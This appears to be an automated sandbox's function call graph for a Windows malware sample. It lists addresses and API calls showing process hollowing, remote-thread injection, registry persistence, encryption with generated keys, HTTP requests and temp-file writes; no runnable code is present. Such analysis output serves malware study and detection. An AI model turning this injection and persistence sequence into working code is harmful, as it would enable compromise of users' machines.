a197dc 11777->11779 11778->11779 11779->11770 11781 a159f3 11780->11781 11782 a15949 11780->11782 11781->11519 11782->11781 11783 a159de CharUpperA 11782->11783 11783->11782 11785 a18ce7 11784->11785 11786 a18bc7 11784->11786 11785->11531 11786->11785 11787 a18be5 CryptAcquireContextA 11786->11787 11788 a18c09 GetLastError 11787->11788 11789 a18c3e 11787->11789 11790 a18c24 CryptAcquireContextA 11788->11790 11791 a18c1b 11788->11791 11789->11785 11792 a18c48 CryptCreateHash 11789->11792 11790->11789 11791->11789 11791->11790 11793 a18c63 CryptHashData 11792->11793 11794 a18cdb CryptReleaseContext 11792->11794 11795 a18cd1 CryptDestroyHash 11793->11795 11796 a18c7b CryptGetHashParam 11793->11796 11794->11785 11795->11794 11796->11795 11797 a18ca3 11796->11797 11797->11795 11798 a18cab CryptGetHashParam 11797->11798 11798->11795 11799 a18ccb 11798->11799 11799->11795 11801 a19722 11800->11801 11802 a19667 11800->11802 11801->11531 11802->11801 11803 a19685 lstrlenA 11802->11803 11807 a19699 11803->11807 11804 a196fd lstrlenA 11805 a19715 lstrlenA 11804->11805 11806 a1970c 11804->11806 11805->11801 11806->11805 11807->11804 11808 a196d4 lstrcatA lstrlenA 11807->11808 11808->11807 11809->11557 11811 a112fc 11810->11811 11812 a112e6 11810->11812 11812->11811 11813 a1131d RegOpenKeyExA 11812->11813 11814 a11341 lstrlenA RegSetValueExA RegCloseKey 11813->11814 11815 a11378 Sleep 11813->11815 11814->11815 11815->11812 11817 a15ef6 RegSetValueExA 11816->11817 11818 a19bda 11816->11818 11817->11568 11818->11817 11819 a19b90 QueryPerformanceCounter 11818->11819 11819->11818 11821 a15f58 lstrcpyA lstrcatA 11820->11821 11821->11582 11821->11583 11823 a179d2 11822->11823 11824 a1a417 11822->11824 11823->11626 11823->11627 11824->11823 11825 a1a442 RegOpenKeyExA 11824->11825 11825->11823 11826 a1a466 RegQueryValueExA 11825->11826 11827 a1a490 RegCloseKey 11826->11827 11828 a1a48a 11826->11828 11827->11823 11828->11827 11830 a193f8 11829->11830 11831 a192fa 11829->11831 11830->11641 11831->11830 11832 a19304 GetLocalTime 11831->11832 11834 a19322 11832->11834 11833 a18bb0 9 API calls 11833->11834 11834->11830 11834->11833 11835 a19650 5 API calls 11834->11835 11836 a193c9 lstrcatA 11835->11836 11836->11834 11837->11654 11839 a14b96 11838->11839 11840 a14ad6 CoInitialize 11838->11840 11841 a14ade 11840->11841 11842 a14b80 Sleep 11841->11842 11843 a14aeb WaitForSingleObject 11841->11843 11842->11841 11843->11842 11844 a14b01 EnterCriticalSection 11843->11844 11904 a18250 11844->11904 11847 a14b50 11909 a162b0 11847->11909 11850 a14b90 CoUninitialize 11850->11839 11852 a156f0 CoUninitialize 11851->11852 11853 a14bc2 11851->11853 11854 a14bd1 SetEvent 11853->11854 11855 a14bf9 11854->11855 11855->11852 11856 a14c10 WaitForSingleObject 11855->11856 11857 a14c28 VirtualAlloc VirtualAlloc VirtualAlloc 11855->11857 11856->11857 11858 a14c23 11856->11858 11857->11858 11859 a14c8a 11857->11859 11858->11852 11859->11858 11861 a14cc3 11859->11861 11865 a152a2 11859->11865 11866 a14ce5 11861->11866 11868 a14db7 GetCurrentThreadId 11861->11868 11869 a14e2c 11861->11869 11863 a15354 lstrlenA lstrlenA 11864 a156b8 VirtualFree VirtualFree VirtualFree 11863->11864 11867 a15385 wsprintfA CryptBinaryToStringA 11863->11867 11864->11858 12187 a18370 11865->12187 11867->11864 11870 a153d0 MultiByteToWideChar 11867->11870 11868->11866 11869->11866 11872 a14ee1 11869->11872 11873 a14e81 GetSystemMetrics GetSystemMetrics 11869->11873 12206 a117d0 11870->12206 11874 a14ef0 GlobalMemoryStatus 11872->11874 11877 a14f40 11872->11877 11873->11866 11874->11866 11876 a1569b 11876->11864 11878 a156a4 VirtualFree 11876->11878 11877->11866 11881 a15032 11877->11881 11882 a14fdf lstrlenA 11877->11882 11878->11864 11879 a1551b 11879->11876 11883 a1552c EnterCriticalSection 11879->11883 11880 a1547d VirtualFree 11886 a154b1 11880->11886 11884 a15041 lstrlenA 11881->11884 11885 a15096 11881->11885 11882->11866 11887 a15542 VirtualAlloc 11883->11887 11888 a1558c VirtualAlloc 11883->11888 11884->11866 11889 a150a5 lstrlenA 11885->11889 11890 a15104 11885->11890 11886->11879 11896 a117d0 16 API calls 11886->11896 11891 a15578 11887->11891 11894 a155c7 GetTickCount 11888->11894 11895 a1568e LeaveCriticalSection 11888->11895 11889->11866 11892 a15113 lstrlenA 11890->11892 11893 a15172 11890->11893 11891->11895 11892->11866 11897 a15181 lstrlenA 11893->11897 11898 a151e0 11893->11898 11902 a155da 11894->11902 11895->11876 11896->11886 11897->11866 11899 a1523f 11898->11899 11900 a151ef lstrlenA 11898->11900 11899->11866 11901 a19b90 QueryPerformanceCounter 11899->11901 11900->11866 11901->11866 11903 a1565c VirtualFree 11902->11903 11903->11895 11905 a14b37 LeaveCriticalSection 11904->11905 11907 a18267 11904->11907 11905->11842 11905->11847 11906 a182e7 StrStrA 11906->11905 11906->11907 11907->11905 11907->11906 11994 a18090 11907->11994 11910 a14b5d VirtualFree SetEvent 11909->11910 11912 a162ca 11909->11912 11910->11850 11911 a16427 11911->11910 11914 a164ba GetEnvironmentVariableA 11911->11914 11923 a165f3 11911->11923 11912->11910 11912->11911 11913 a16399 11912->11913 11916 a16410 11913->11916 11917 a163a4 VirtualAlloc 11913->11917 11918 a164e1 11914->11918 11915 a165fe 11915->11915 11922 a11ee0 5 API calls 11916->11922 11920 a1640e 11917->11920 11929 a163cc 11917->11929 12016 a19730 11918->12016 11919 a16bdd 11921 a16c13 11919->11921 12090 a1a360 11919->12090 11920->11911 11922->11920 11923->11915 11923->11919 12055 a17250 11923->12055 11930 a163fd VirtualFree 11929->11930 12013 a11ee0 CreateThread 11929->12013 11930->11920 11931 a16552 WriteFile 11935 a16588 11931->11935 11936 a165dd 11931->11936 11932 a16752 11940 a169ba GetEnvironmentVariableA 11932->11940 11944 a16858 11932->11944 11945 a1678e VirtualAlloc 11932->11945 11933 a16654 VirtualAlloc 11933->11932 11937 a1667a 11933->11937 11935->11936 11941 a16593 CloseHandle 11935->11941 11936->11923 11938 a165e6 CloseHandle 11936->11938 12067 a197a0 GetProcessHeap RtlAllocateHeap 11937->12067 11938->11923 11943 a169e1 11940->11943 12020 a16c60 11941->12020 11950 a19730 QueryPerformanceCounter 11943->11950 11947 a12070 32 API calls 11944->11947 11948 a16856 11945->11948 11956 a167c6 11945->11956 11947->11948 11960 a16880 11948->11960 11961 a16894 11948->11961 11975 a169a6 11948->11975 11953 a169f2 GetTickCount GetTempFileNameA CreateFileA 11950->11953 11959 a16a4f 11953->11959 11990 a16bbd 11953->11990 11954 a16698 CreateThread CloseHandle 11954->11932 12124 a16da0 11954->12124 11955 a16842 VirtualFree 11955->11948 11956->11955 12068 a12070 11956->12068 11957 a165c9 12032 a174a0 11957->12032 11958 a165d8 11958->11936 11964 a16cf0 4 API calls 11958->11964 11965 a16a7b VirtualAlloc 11959->11965 11966 a16b1e WriteFile 11959->11966 12071 a173c0 11960->12071 11974 a1698a 11961->11974 12078 a197a0 GetProcessHeap RtlAllocateHeap 11961->12078 11964->11936 11969 a16b1c 11965->11969 11973 a16aaf 11965->11973 11966->11969 11976 a16bc9 CloseHandle 11969->11976 11980 a16b59 CloseHandle 11969->11980 11986 a16ad2 WriteFile 11973->11986 11987 a16b08 VirtualFree 11973->11987 11974->11975 12079 a12510 11974->12079 11975->11940 11976->11990 11977 a16809 VirtualAlloc 11981 a1683f 11977->11981 11978 a168aa 11982 a168e9 VirtualAlloc 11978->11982 11983 a168ca 11978->11983 11984 a11e60 2 API calls 11980->11984 11981->11955 11982->11983 11985 a1690f 11982->11985 11983->11974 11989 a1693f CreateThread CloseHandle 11983->11989 11988 a16b72 11984->11988 11985->11983 11986->11987 11987->11969 11988->11990 11991 a16b9e 11988->11991 11992 a173c0 5 API calls 11988->11992 11989->11974 12167 a177b0 11989->12167 11990->11919 11991->11990 11993 a12510 8 API calls 11991->11993 11992->11991 11993->11990 11995 a180a7 11994->11995 11996 a18246 11994->11996 11995->11996 11997 a180c5 VirtualAlloc 11995->11997 11996->11907 11997->11996 11998 a180eb 11997->11998 12006 a11390 11998->12006 12000 a18204 12000->11996 12001 a18235 VirtualFree 12000->12001 12001->11996 12002 a18100 12002->12000 12003 a18a70 9 API calls 12002->12003 12004 a181dd 12003->12004 12004->12000 12005 a181e4 VirtualAlloc 12004->12005 12005->12000 12007 a1139c 12006->12007 12008 a113ae 12006->12008 12007->12008 12009 a113b6 GetProcessHeap RtlAllocateHeap 12007->12009 12008->12002 12009->12008 12010 a113e4 12009->12010 12011 a114e4 GetProcessHeap RtlFreeHeap 12010->12011 12012 a11498 GetProcessHeap HeapFree 12010->12012 12011->12008 12012->12008 12014 a11f21 12013->12014 12015 a11f0a WaitForSingleObject 12013->12015 12095 a11f30 12013->12095 12014->11930 12015->12014 12017 a164f2 GetTickCount GetTempFileNameA CreateFileA 12016->12017 12019 a19743 12016->12019 12017->11923 12017->11931 12018 a19763 QueryPerformanceCounter 12018->12019 12019->12017 12019->12018 12021 a16c83 RegOpenKeyExA 12020->12021 12022 a16c7c 12020->12022 12023 a165ab 12021->12023 12024 a16ca7 12021->12024 12022->12021 12027 a11e60 12023->12027 12025 a19b90 QueryPerformanceCounter 12024->12025 12026 a16cae RegSetValueExA RegCloseKey 12025->12026 12026->12023 12028 a11e73 12027->12028 12029 a11ece 12027->12029 12030 a11e90 CreateProcessA 12028->12030 12029->11957 12029->11958 12030->12029 12031 a11ebe CloseHandle 12030->12031 12031->12029 12033 a174bc 12032->12033 12034 a174d2 Sleep 12033->12034 12035 a174f5 GetModuleFileNameA 12034->12035 12036 a1750b 12034->12036 12037 a17583 SetFileAttributesA wnsprintfA 12035->12037 12038 a17520 GetAllUsersProfileDirectoryA 12036->12038 12039 a17536 GetEnvironmentVariableA 12036->12039 12041 a175d4 RegOpenKeyExA 12037->12041 12042 a175c6 TerminateThread 12037->12042 12040 a1754d lstrcatA lstrcatA lstrcatA 12038->12040 12039->12040 12040->12037 12044 a17649 12041->12044 12045 a1762a RegDeleteValueA RegCloseKey 12041->12045 12042->12041 12046 a1765e GetEnvironmentVariableA GetTickCount GetTempFileNameA lstrcatA CreateFileA 12044->12046 12047 a15e30 6 API calls 12044->12047 12045->12044 12048 a165ce ExitProcess 12046->12048 12049 a176df lstrlenA WriteFile CloseHandle 12046->12049 12050 a1765b 12047->12050 12051 a17731 12049->12051 12050->12046 12052 a17744 CreateProcessA 12051->12052 12053 a177a3 ExitProcess 12052->12053 12054 a17796 CloseHandle 12052->12054 12054->12053 12056 a17264 12055->12056 12057 a16638 12055->12057 12056->12057 12058 a172ad wsprintfA 12056->12058 12057->11932 12057->11933 12059 a172d8 12058->12059 12060 a172df RegOpenKeyExA 12058->12060 12059->12060 12060->12057 12061 a17307 RegQueryValueExA 12060->12061 12062 a17333 12061->12062 12063 a173a5 RegCloseKey 12061->12063 12062->12063 12064 a17339 GetLocalTime 12062->12064 12063->12057 12101 a19910 SystemTimeToFileTime SystemTimeToFileTime 12064->12101 12066 a17388 12066->12063 12067->11954 12103 a120b0 12068->12103 12072 a173d0 12071->12072 12073 a16891 12071->12073 12072->12073 12074 a17419 wsprintfA 12072->12074 12073->11961 12075 a17444 12074->12075 12076 a1744b RegOpenKeyExA 12074->12076 12075->12076 12076->12073 12077 a1746f GetLocalTime RegSetValueExA RegCloseKey 12076->12077 12077->12073 12078->11978 12080 a12573 12079->12080 12081 a12527 12079->12081 12080->11975 12081->12080 12082 a12531 VirtualAlloc 12081->12082 12082->12080 12083 a1257a VirtualAllocEx 12082->12083 12084 a1259f VirtualAllocEx 12083->12084 12086 a125d7 12083->12086 12085 a125bf VirtualFree 12084->12085 12084->12086 12085->12080 12087 a12653 WriteProcessMemory 12086->12087 12088 a12672 VirtualFree 12087->12088 12089 a12687 VirtualFree CreateRemoteThread 12087->12089 12088->12080 12089->12080 12091 a1a3ed 12090->12091 12092 a1a370 12090->12092 12091->11921 12092->12091 12093 a1a39b RegOpenKeyExA 12092->12093 12093->12091 12094 a1a3bf RegSetValueExA RegCloseKey 12093->12094 12094->12091 12096 a11f50 VirtualAlloc 12095->12096 12100 a1203f 12095->12100 12097 a11f97 VirtualAlloc 12096->12097 12098 a11fad 12096->12098 12097->12098 12099 a12ed0 GetPEB 12098->12099 12098->12100 12099->12100 12102 a1996b __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 12101->12102 12102->12066 12104 a120c3 GetEnvironmentVariableA lstrcatA 12103->12104 12105 a12080 12103->12105 12106 a120f2 lstrcatA lstrcatA 12104->12106 12107 a12115 12104->12107 12105->11955 12105->11977 12106->12107 12108 a12138 VirtualAlloc 12107->12108 12108->12105 12109 a1219d CreateProcessA 12108->12109 12110 a121e2 VirtualAllocEx 12109->12110 12111 a121ca VirtualFree 12109->12111 12112 a12213 VirtualAllocEx 12110->12112 12114 a1227d 12110->12114 12111->12105 12113 a1223c TerminateProcess CloseHandle CloseHandle VirtualFree 12112->12113 12112->12114 12113->12105 12115 a1237b WriteProcessMemory 12114->12115 12116 a123e1 VirtualFree Wow64GetThreadContext 12115->12116 12117 a123a0 TerminateProcess CloseHandle CloseHandle VirtualFree 12115->12117 12118 a12444 WriteProcessMemory 12116->12118 12119 a12414 TerminateProcess CloseHandle CloseHandle 12116->12119 12117->12105 12120 a12497 Wow64SetThreadContext 12118->12120 12121 a1246a TerminateProcess CloseHandle CloseHandle 12118->12121 12119->12105 12122 a124c4 ResumeThread 12120->12122 12123 a124d9 TerminateProcess CloseHandle CloseHandle 12120->12123 12121->12105 12122->12105 12123->12105 12125 a16db9 Sleep CoInitialize 12124->12125 12126 a1723f 12124->12126 12127 a17017 GetEnvironmentVariableA 12125->12127 12128 a16e1b 12125->12128 12131 a1703e 12127->12131 12129 a16ee5 12128->12129 12130 a16e3f VirtualAlloc 12128->12130 12132 a12070 32 API calls 12129->12132 12137 a16ee3 12130->12137 12139 a16e6e 12130->12139 12133 a19730 QueryPerformanceCounter 12131->12133 12132->12137 12134 a1704f GetTickCount GetTempFileNameA CreateFileA 12133->12134 12135 a17239 CoUninitialize 12134->12135 12136 a170ac 12134->12136 12135->12126 12140 a1718b WriteFile 12136->12140 12141 a170db VirtualAlloc 12136->12141 12142 a173c0 5 API calls 12137->12142 12148 a16f21 12137->12148 12166 a1700f 12137->12166 12138 a16ed2 VirtualFree 12138->12137 12139->12138 12144 a12070 32 API calls 12139->12144 12147 a171b5 CloseHandle 12140->12147 12145 a17116 12141->12145 12146 a17189 12141->12146 12142->12148 12143 a16ff6 12153 a12510 8 API calls 12143->12153 12143->12166 12150 a16e97 12144->12150 12158 a17175 VirtualFree 12145->12158 12159 a1713f WriteFile 12145->12159 12146->12147 12147->12135 12154 a171cb 12147->12154 12148->12143 12185 a197a0 GetProcessHeap RtlAllocateHeap 12148->12185 12150->12138 12152 a16ea8 VirtualAlloc 12150->12152 12151 a16f3a 12155 a16f6a VirtualAlloc 12151->12155 12157 a16f57 12151->12157 12156 a16ecf 12152->12156 12153->12166 12154->12135 12160 a11e60 2 API calls 12154->12160 12155->12157 12156->12138 12157->12143 12161 a16fbd CreateThread CloseHandle 12157->12161 12158->12146 12159->12158 12162 a171e5 12160->12162 12161->12143 12186 a177b0 49 API calls 12161->12186 12162->12135 12163 a17217 12162->12163 12164 a173c0 5 API calls 12162->12164 12163->12135 12165 a12510 8 API calls 12163->12165 12164->12163 12165->12166 12166->12135 12168 a177c0 CoInitialize 12167->12168 12169 a178c3 12167->12169 12170 a177e8 12168->12170 12171 a178bd CoUninitialize 12168->12171 12172 a17898 VirtualFree 12170->12172 12173 a177fc GetExitCodeProcess 12170->12173 12171->12169 12176 a197c0 2 API calls 12172->12176 12174 a1788f 12173->12174 12175 a17818 12173->12175 12174->12172 12177 a17821 Sleep 12175->12177 12178 a1782e CloseHandle Sleep 12175->12178 12179 a178ba 12176->12179 12177->12174 12180 a12070 32 API calls 12178->12180 12179->12171 12182 a17851 12180->12182 12181 a17863 12181->12172 12182->12174 12182->12181 12183 a12510 8 API calls 12182->12183 12184 a1788c 12183->12184 12184->12174 12185->12151 12188 a15344 12187->12188 12189 a18387 12187->12189 12188->11863 12188->11864 12189->12188 12190 a183b1 VirtualAlloc VirtualAlloc 12189->12190 12191 a18592 12190->12191 12192 a183e9 12190->12192 12193 a185a9 12191->12193 12194 a18598 VirtualFree 12191->12194 12192->12191 12210 a18800 12192->12210 12193->12188 12196 a185af VirtualFree 12193->12196 12194->12193 12196->12188 12202 a1847e 12232 a18970 12202->12232 12204 a18581 VirtualFree 12204->12191 12205 a184ad 12205->12204 12207 a1181e 12206->12207 12208 a117e1 12206->12208 12207->11876 12207->11879 12207->11880 12208->12207 12243 a11840 12208->12243 12211 a18817 12210->12211 12212 a18420 12210->12212 12211->12212 12213 a18821 CryptAcquireContextA 12211->12213 12212->12191 12226 a18770 12212->12226 12214 a18845 GetLastError 12213->12214 12215 a1887a 12213->12215 12216 a18860 CryptAcquireContextA 12214->12216 12217 a18857 12214->12217 12215->12212 12218 a18884 CryptGenKey 12215->12218 12216->12215 12217->12215 12217->12216 12219 a18950 CryptReleaseContext 12218->12219 12220 a188bd CryptExportKey 12218->12220 12219->12212 12221 a18946 CryptDestroyKey 12220->12221 12222 a188d9 12220->12222 12221->12219 12223 a188f1 CryptImportKey 12222->12223 12225 a1893d 12222->12225 12224 a18916 CryptExportKey CryptDestroyKey 12223->12224 12223->12225 12224->12225 12225->12221 12227 a187d0 QueryPerformanceCounter 12226->12227 12228 a1844b 12227->12228 12229 a187d0 12228->12229 12230 a187e3 QueryPerformanceCounter 12229->12230 12231 a18458 VirtualAlloc 12229->12231 12230->12231 12231->12191 12231->12202 12233 a18a60 12232->12233 12234 a18987 12232->12234 12233->12205 12234->12233 12235 a189a5 CryptAcquireContextA 12234->12235 12236 a189c9 GetLastError 12235->12236 12237 a189fe 12235->12237 12238 a189e4 CryptAcquireContextA 12236->12238 12239 a189db 12236->12239 12237->12233 12240 a18a04 CryptImportKey 12237->12240 12238->12237 12239->12237 12239->12238 12241 a18a54 CryptReleaseContext 12240->12241 12242 a18a29 CryptEncrypt CryptDestroyKey 12240->12242 12241->12233 12242->12241 12244 a11c95 12243->12244 12245 a1185a 12243->12245 12244->12207 12245->12244 12246 a118ba InternetCrackUrlA 12245->12246 12246->12244 12247 a11910 InternetOpenA 12246->12247 12247->12244 12248 a11936 InternetConnectA 12247->12248 12249 a11c88 InternetCloseHandle 12248->12249 12250 a1196f HttpOpenRequestA 12248->12250 12249->12244 12251 a11c7b InternetCloseHandle 12250->12251 12252 a119ad wnsprintfA HttpAddRequestHeadersA 12250->12252 12251->12249 12253 a119eb InternetSetOptionA 12252->12253 12254 a11c6e InternetCloseHandle 12252->12254 12263 a11a30 12253->12263 12254->12251 12256 a11a4d HttpSendRequestA 12257 a11a7b HttpQueryInfoA 12256->12257 12256->12263 12257->12263 12258 a11adc HttpQueryInfoA 12259 a11b47 VirtualAlloc 12258->12259 12258->12263 12260 a11c19 12259->12260 12259->12263 12262 a11c23 InternetReadFile 12260->12262 12261 a11b99 InternetReadFile 12261->12263 12262->12262 12262->12263 12263->12254 12263->12256 12263->12258 12263->12259 12263->12261 12265 56397c 12264->12265 12270 563777 12264->12270 12266 5639bb GetModuleFileNameA GetCurrentActCtx 12265->12266 12267 563a09 12265->12267 12266->12267 12268 563ad3 GetNamedPipeInfo DeleteFileA 12267->12268 12269 5638e7 12267->12269 12268->12268 12268->12269 12269->11356 12272 5616c0 12270->12272 12273 561720 12272->12273 12276 5617cb 12272->12276 12274 5617d5 12273->12274 12275 56172f 12273->12275 12274->12276 12279 57049e CreateThread 12274->12279 12281 571542 12275->12281 12276->12269 12279->12276 12283 571596 12281->12283 12282 56178f 12285 564f25 12282->12285 12283->12282 12284 57164a GetLastError SetHandleInformation 12283->12284 12284->12282 12286 564fe3 12285->12286 12287 564f63 12285->12287 12288 570d94 GetNamedPipeHandleStateA 12286->12288 12287->12276 12288->12287 12290 563fb1 12289->12290 12291 563dda 12289->12291 12290->12291 12292 563fc7 GetCurrentDirectoryA 12290->12292 12291->11359 12292->12290 10480 568220 10481 568231 10480->10481 10483 56811e 10480->10483 10503 5669e4 GetLastError 10483->10503 10485 56812b 10523 56823d 10485->10523 10487 568133 10532 567eb2 10487->10532 10490 56814a 10490->10481 10496 568188 10556 5662bc 10496->10556 10498 56818d 10559 5673bc 10498->10559 10499 5681a5 10500 5681d1 10499->10500 10501 5673bc _free 20 API calls 10499->10501 10500->10498 10565 567d05 10500->10565 10501->10500 10504 566a00 10503->10504 10505 5669fa 10503->10505 10509 566a4f SetLastError 10504->10509 10575 56735f 10504->10575 10568 5675b9 10505->10568 10509->10485 10510 566a1a 10512 5673bc _free 20 API calls 10510->10512 10514 566a20 10512->10514 10517 566a5b SetLastError 10514->10517 10515 566a36 10589 566856 10515->10589 10594 56731c 10517->10594 10520 5673bc _free 20 API calls 10522 566a48 10520->10522 10522->10509 10522->10517 10524 568249 ___scrt_is_nonwritable_in_current_image 10523->10524 10525 5669e4 _abort 35 API calls 10524->10525 10526 568253 10525->10526 10529 5682d7 ___scrt_is_nonwritable_in_current_image 10526->10529 10530 56731c _abort 35 API calls 10526->10530 10531 5673bc _free 20 API calls 10526->10531 10953 567c63 EnterCriticalSection 10526->10953 10954 5682ce 10526->10954 10529->10487 10530->10526 10531->10526 10958 567d2d 10532->10958 10535 567ee5 10537 567eea GetACP 10535->10537 10538 567efc 10535->10538 10536 567ed3 GetOEMCP 10536->10538 10537->10538 10538->10490 10539 569273 10538->10539 10540 5692b1 10539->10540 10544 569281 _free 10539->10544 10541 5662bc _free 20 API calls 10540->10541 10543 56815b 10541->10543 10542 56929c RtlAllocateHeap 10542->10543 10542->10544 10543->10498 10546 5682df 10543->10546 10544->10540 10544->10542 10545 568e0f _free 7 API calls 10544->10545 10545->10544 10547 567eb2 37 API calls 10546->10547 10548 5682fe 10547->10548 10551 56834f IsValidCodePage 10548->10551 10553 568305 10548->10553 10554 568374 ___scrt_fastfail 10548->10554 10549 56a183 _ValidateLocalCookies 5 API calls 10550 568180 10549->10550 10550->10496 10550->10499 10552 568361 GetCPInfo 10551->10552 10551->10553 10552->10553 10552->10554 10553->10549 10995 567f8a GetCPInfo 10554->10995 10557 566a68 _free 20 API calls 10556->10557 10558 5662c1 10557->10558 10558->10498 10560 5673c7 HeapFree 10559->10560 10561 5673f0 _free 10559->10561 10560->10561 10562 5673dc 10560->10562 10561->10490 10563 5662bc _free 18 API calls 10562->10563 10564 5673e2 GetLastError 10563->10564 10564->10561 11071 567cc2 10565->11071 10567 567d29 10567->10498 10605 5673f6 10568->10605 10571 5675f8 TlsGetValue 10574 5675ec 10571->10574 10573 567609 10573->10504 10612 56a183 10574->10612 10580 56736c _free 10575->10580 10576 5673ac 10579 5662bc _free 19 API calls 10576->10579 10577 567397 RtlAllocateHeap 10578 566a12 10577->10578 10577->10580 10578->10510 10582 56760f 10578->10582 10579->10578 10580->10576 10580->10577 10627 568e0f 10580->10627 10583 5673f6 _free 5 API calls 10582->10583 10584 567636 10583->10584 10585 567651 TlsSetValue 10584->10585 10586 567645 10584->10586 10585->10586 10587 56a183 _ValidateLocalCookies 5 API calls 10586->10587 10588 566a2f 10587->10588 10588->10510 10588->10515 10643 56682e 10589->10643 10791 568b98 10594->10791 10597 56732c 10599 567336 IsProcessorFeaturePresent 10597->10599 10600 567354 10597->10600 10601 567341 10599->10601 10825 568a48 10600->10825 10819 566465 10601->10819 10606 567426 10605->10606 10609 567422 10605->10609 10606->10571 10606->10574 10608 567452 GetProcAddress 10610 567462 try_get_function 10608->10610 10609->10606 10611 567446 10609->10611 10619 567492 10609->10619 10610->10606 10611->10606 10611->10608 10613 56a18e IsProcessorFeaturePresent 10612->10613 10614 56a18c 10612->10614 10616 56a648 10613->10616 10614->10573 10626 56a60c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10616->10626 10618 56a72b 10618->10573 10620 5674b3 LoadLibraryExW 10619->10620 10621 5674a8 10619->10621 10622 5674d0 GetLastError 10620->10622 10624 5674e8 10620->10624 10621->10609 10623 5674db LoadLibraryExW 10622->10623 10622->10624 10623->10624 10624->10621 10625 5674ff FreeLibrary 10624->10625 10625->10621 10626->10618 10632 568e53 10627->10632 10629 56a183 _ValidateLocalCookies 5 API calls 10630 568e4f 10629->10630 10630->10580 10631 568e25 10631->10629 10633 568e5f ___scrt_is_nonwritable_in_current_image 10632->10633 10638 567c63 EnterCriticalSection 10633->10638 10635 568e6a 10639 568e9c 10635->10639 10637 568e91 ___scrt_is_nonwritable_in_current_image 10637->10631 10638->10635 10642 567cab LeaveCriticalSection 10639->10642 10641 568ea3 10641->10637 10642->10641 10649 56676e 10643->10649 10645 566852 10646 5667de 10645->10646 10660 566672 10646->10660 10648 566802 10648->10520 10650 56677a ___scrt_is_nonwritable_in_current_image 10649->10650 10655 567c63 EnterCriticalSection 10650->10655 10652 566784 10656 5667aa 10652->10656 10654 5667a2 ___scrt_is_nonwritable_in_current_image 10654->10645 10655->10652 10659 567cab LeaveCriticalSection 10656->10659 10658 5667b4 10658->10654 10659->10658 10661 56667e ___scrt_is_nonwritable_in_current_image 10660->10661 10668 567c63 EnterCriticalSection 10661->10668 10663 566688 10669 566999 10663->10669 10665 5666a0 10673 5666b6 10665->10673 10667 5666ae ___scrt_is_nonwritable_in_current_image 10667->10648 10668->10663 10670 5669cf __fassign 10669->10670 10671 5669a8 __fassign 10669->10671 10670->10665 10671->10670 10676 56790e 10671->10676 10790 567cab LeaveCriticalSection 10673->10790 10675 5666c0 10675->10667 10678 56798e 10676->10678 10679 567924 10676->10679 10680 5673bc _free 20 API calls 10678->10680 10703 5679dc 10678->10703 10679->10678 10684 5673bc _free 20 API calls 10679->10684 10698 567957 10679->10698 10681 5679b0 10680->10681 10682 5673bc _free 20 API calls 10681->10682 10685 5679c3 10682->10685 10683 5673bc _free 20 API calls 10686 567983 10683->10686 10688 56794c 10684->10688 10690 5673bc _free 20 API calls 10685->10690 10691 5673bc _free 20 API calls 10686->10691 10687 567a4a 10692 5673bc _free 20 API calls 10687->10692 10704 568fdd 10688->10704 10689 5673bc _free 20 API calls 10695 56796e 10689->10695 10696 5679d1 10690->10696 10691->10678 10697 567a50 10692->10697 10694 5673bc 20 API calls _free 10699 5679ea 10694->10699 10732 5690db 10695->10732 10701 5673bc _free 20 API calls 10696->10701 10697->10670 10698->10689 10702 567979 10698->10702 10699->10687 10699->10694 10701->10703 10702->10683 10744 567a81 10703->10744 10705 568fee 10704->10705 10731 5690d7 10704->10731 10706 5673bc _free 20 API calls 10705->10706 10707 568fff 10705->10707 10706->10707 10708 5673bc _free 20 API calls 10707->10708 10710 569011 10707->10710 10708->10710 10709 569023 10711 569035 10709->10711 10713 5673bc _free 20 API calls 10709->10713 10710->10709 10712 5673bc _free 20 API calls 10710->10712 10714 569047 10711->10714 10715 5673bc _free 20 API calls 10711->10715 10712->10709 10713->10711 10716 569059 10714->10716 10717 5673bc _free 20 API calls 10714->10717 10715->10714 10718 56906b 10716->10718 10720 5673bc _free 20 API calls 10716->10720 10717->10716 10719 56907d 10718->10719 10721 5673bc _free 20 API calls 10718->10721 10722 56908f 10719->10722 10723 5673bc _free 20 API calls 10719->10723 10720->10718 10721->10719 10724 5690a1 10722->10724 10725 5673bc _free 20 API calls 10722->10725 10723->10722 10726 5690b3 10724->10726 10728 5673bc _free 20 API calls 10724->10728 10725->10724 10727 5690c5 10726->10727 10729 5673bc _free 20 API calls 10726->10729 10730 5673bc _free 20 API calls 10727->10730 10727->10731 10728->10726 10729->10727 10730->10731 10731->10698 10733 5690e8 10732->10733 10743 569140 10732->10743 10734 5673bc _free 20 API calls 10733->10734 10735 5690f8 10733->10735 10734->10735 10736 56910a 10735->10736 10737 5673bc _free 20 API calls 10735->10737 10738 56911c 10736->10738 10739 5673bc _free 20 API calls 10736->10739 10737->10736 10740 56912e 10738->10740 10741 5673bc _free 20 API calls 10738->10741 10739->10738 10742 5673bc _free 20 API calls 10740->10742 10740->10743 10741->10740 10742->10743 10743->10702 10745 567a8e 10744->10745 10749 567aac 10744->10749 10745->10749 10750 569180 10745->10750 10748 5673bc _free 20 API calls 10748->10749 10749->10699 10751 569191 10750->10751 10785 567aa6 10750->10785 10786 569144 10751->10786 10754 569144 __fassign 20 API calls 10755 5691a4 10754->10755 10756 569144 __fassign 20 API calls 10755->10756 10757 5691af 10756->10757 10758 569144 __fassign 20 API calls 10757->10758 10759 5691ba 10758->10759 10760 569144 __fassign 20 API calls 10759->10760 10761 5691c8 10760->10761 10762 5673bc _free 20 API calls 10761->10762 10763 5691d3 10762->10763 10764 5673bc _free 20 API calls 10763->10764 10765 5691de 10764->10765 10766 5673bc _free 20 API calls 10765->10766 10767 5691e9 10766->10767 10768 569144 __fassign 20 API calls 10767->10768 10769 5691f7 10768->10769 10770 569144 __fassign 20 API calls 10769->10770 10771 569205 10770->10771 10772 569144 __fassign 20 API calls 10771->10772 10773 569216 10772->10773 10774 569144 __fassign 20 API calls 10773->10774 10775 569224 10774->10775 10776 569144 __fassign 20 API calls 10775->10776 10777 569232 10776->10777 10778 5673bc _free 20 API calls 10777->10778 10779 56923d 10778->10779 10780 5673bc _free 20 API calls 10779->10780 10781 569248 10780->10781 10782 5673bc _free 20 API calls 10781->10782 10783 569253 10782->10783 10784 5673bc _free 20 API calls 10783->10784 10784->10785 10785->10748 10787 56917b 10786->10787 10788 56916b 10786->10788 10787->10754 10788->10787 10789 5673bc _free 20 API calls 